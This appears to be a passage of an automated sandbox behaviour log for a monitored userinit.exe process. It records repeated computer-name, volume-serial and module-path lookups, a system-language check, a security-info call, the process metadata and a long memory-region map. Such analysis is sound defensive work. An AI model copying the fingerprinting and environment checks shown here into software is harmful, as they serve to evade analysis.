[0110.522] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0110.522] SetSecurityInfo () returned 0x0
[0110.522] CloseHandle (hObject=0x1d0) returned 1
[0110.522] GetComputerNameA (in: lpBuffer=0x2b6fd84, nSize=0xce88c | out: lpBuffer="CRH2YWU7", nSize=0xce88c) returned 1
[0110.522] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.522] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.523] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce780, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.523] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.523] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce780, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.523] VirtualAlloc (lpAddress=0x2b70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b70000
[0110.523] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.524] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.524] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.524] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.524] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.525] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.525] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.525] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.525] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.525] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.525] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.525] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.525] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xce874, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xce888, lpMaximumComponentLength=0xce884, lpFileSystemFlags=0xce880, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce888*=0x90c08a66, lpMaximumComponentLength=0xce884*=0xff, lpFileSystemFlags=0xce880*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.525] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xce778, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.525] GetSystemDefaultLangID () returned 0x200409
[0110.526] VerLanguageNameA (in: wLang=0x409, szLang=0xce82c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0110.526] ExitProcess (uExitCode=0x0)
Thread:
id = 237
os_tid = 0xfac
Thread:
id = 238
os_tid = 0xfb0
Process:
id = "34"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be740"
os_pid = "0xfc8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3452
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3453
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3454
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3455
start_va = 0x170000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 3456
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 3457
start_va = 0x4b0000
end_va = 0x4b8fff
entry_point = 0x4b0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 3458
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3459
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3460
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 3461
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 3462
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 3463
start_va = 0x290000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 3464
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3465
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3466
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3467
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3468
start_va = 0x670000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 3469
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3470
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3471
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3472
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3473
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3474
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3475
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3476
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3477
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3478
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3479
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3480
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3481
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 3482
start_va = 0x1b0000
end_va = 0x277fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 3483
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3484
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3485
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 3486
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3487
start_va = 0xf0000
end_va = 0xfffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 3488
start_va = 0x4c0000
end_va = 0x5c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 3489
start_va = 0x680000
end_va = 0x127ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000680000"
filename = ""
Region:
id = 3490
start_va = 0x1280000
end_va = 0x137ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001280000"
filename = ""
Region:
id = 3491
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 3492
start_va = 0x5d0000
end_va = 0x66ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 3493
start_va = 0x1380000
end_va = 0x145efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001380000"
filename = ""
Region:
id = 3494
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3495
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 3496
start_va = 0x1460000
end_va = 0x15dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 3497
start_va = 0x15e0000
end_va = 0x1f0ffff
entry_point = 0x15e0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3498
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 3499
start_va = 0x100000
end_va = 0x101fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 3500
start_va = 0x1f10000
end_va = 0x2302fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f10000"
filename = ""
Region:
id = 3501
start_va = 0x1460000
end_va = 0x14dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 3502
start_va = 0x15a0000
end_va = 0x15dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015a0000"
filename = ""
Region:
id = 3503
start_va = 0x2310000
end_va = 0x241cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 3505
start_va = 0x2420000
end_va = 0x251ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002420000"
filename = ""
Region:
id = 3521
start_va = 0x2520000
end_va = 0x271ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 3522
start_va = 0x14e0000
end_va = 0x1560fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3542
start_va = 0x2720000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3543
start_va = 0x14e0000
end_va = 0x1564fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3544
start_va = 0x2720000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3545
start_va = 0x14e0000
end_va = 0x1568fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3546
start_va = 0x2720000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3547
start_va = 0x14e0000
end_va = 0x156cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3556
start_va = 0x2720000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3557
start_va = 0x14e0000
end_va = 0x1570fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3558
start_va = 0x2720000
end_va = 0x27b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3559
start_va = 0x14e0000
end_va = 0x1574fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3571
start_va = 0x2720000
end_va = 0x27b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3572
start_va = 0x14e0000
end_va = 0x1578fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3573
start_va = 0x2720000
end_va = 0x27bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3574
start_va = 0x14e0000
end_va = 0x157cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3575
start_va = 0x2720000
end_va = 0x27befff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3576
start_va = 0x14e0000
end_va = 0x1580fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3577
start_va = 0x2720000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3579
start_va = 0x14e0000
end_va = 0x1584fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3580
start_va = 0x2720000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3581
start_va = 0x14e0000
end_va = 0x1588fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3584
start_va = 0x2720000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3585
start_va = 0x14e0000
end_va = 0x158cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3586
start_va = 0x2720000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3591
start_va = 0x14e0000
end_va = 0x1590fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3592
start_va = 0x2720000
end_va = 0x27d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3593
start_va = 0x14e0000
end_va = 0x1594fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3598
start_va = 0x2720000
end_va = 0x27d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3599
start_va = 0x14e0000
end_va = 0x1598fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3600
start_va = 0x2720000
end_va = 0x27dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3605
start_va = 0x14e0000
end_va = 0x159cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 3606
start_va = 0x2720000
end_va = 0x27defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3607
start_va = 0x27e0000
end_va = 0x28a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 3611
start_va = 0x28b0000
end_va = 0x2972fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 3612
start_va = 0x2720000
end_va = 0x27e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3613
start_va = 0x27f0000
end_va = 0x28b6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 3618
start_va = 0x2720000
end_va = 0x27e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3619
start_va = 0x27f0000
end_va = 0x28bafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 3623
start_va = 0x2720000
end_va = 0x27ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3624
start_va = 0x27f0000
end_va = 0x28befff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 3625
start_va = 0x28c0000
end_va = 0x2990fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3629
start_va = 0x2720000
end_va = 0x27f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3630
start_va = 0x2800000
end_va = 0x28d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 3634
start_va = 0x2720000
end_va = 0x27f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3635
start_va = 0x2800000
end_va = 0x28d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 3638
start_va = 0x2720000
end_va = 0x27fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3639
start_va = 0x2800000
end_va = 0x28dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 3642
start_va = 0x2720000
end_va = 0x27fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3643
start_va = 0x2800000
end_va = 0x28e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 3647
start_va = 0x28f0000
end_va = 0x29d2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028f0000"
filename = ""
Region:
id = 3648
start_va = 0x2720000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3652
start_va = 0x2810000
end_va = 0x28f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 3653
start_va = 0x2720000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3656
start_va = 0x2810000
end_va = 0x28fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 3657
start_va = 0x2720000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3661
start_va = 0x2810000
end_va = 0x28fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 3662
start_va = 0x2900000
end_va = 0x29f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 3665
start_va = 0x2720000
end_va = 0x2812fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3666
start_va = 0x2820000
end_va = 0x2914fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3670
start_va = 0x2720000
end_va = 0x2816fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3671
start_va = 0x2820000
end_va = 0x2918fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3674
start_va = 0x2720000
end_va = 0x281afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3675
start_va = 0x2820000
end_va = 0x291cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3676
start_va = 0x2720000
end_va = 0x281efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3680
start_va = 0x2820000
end_va = 0x2920fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3683
start_va = 0x2930000
end_va = 0x2a32fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 3684
start_va = 0x2720000
end_va = 0x2824fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
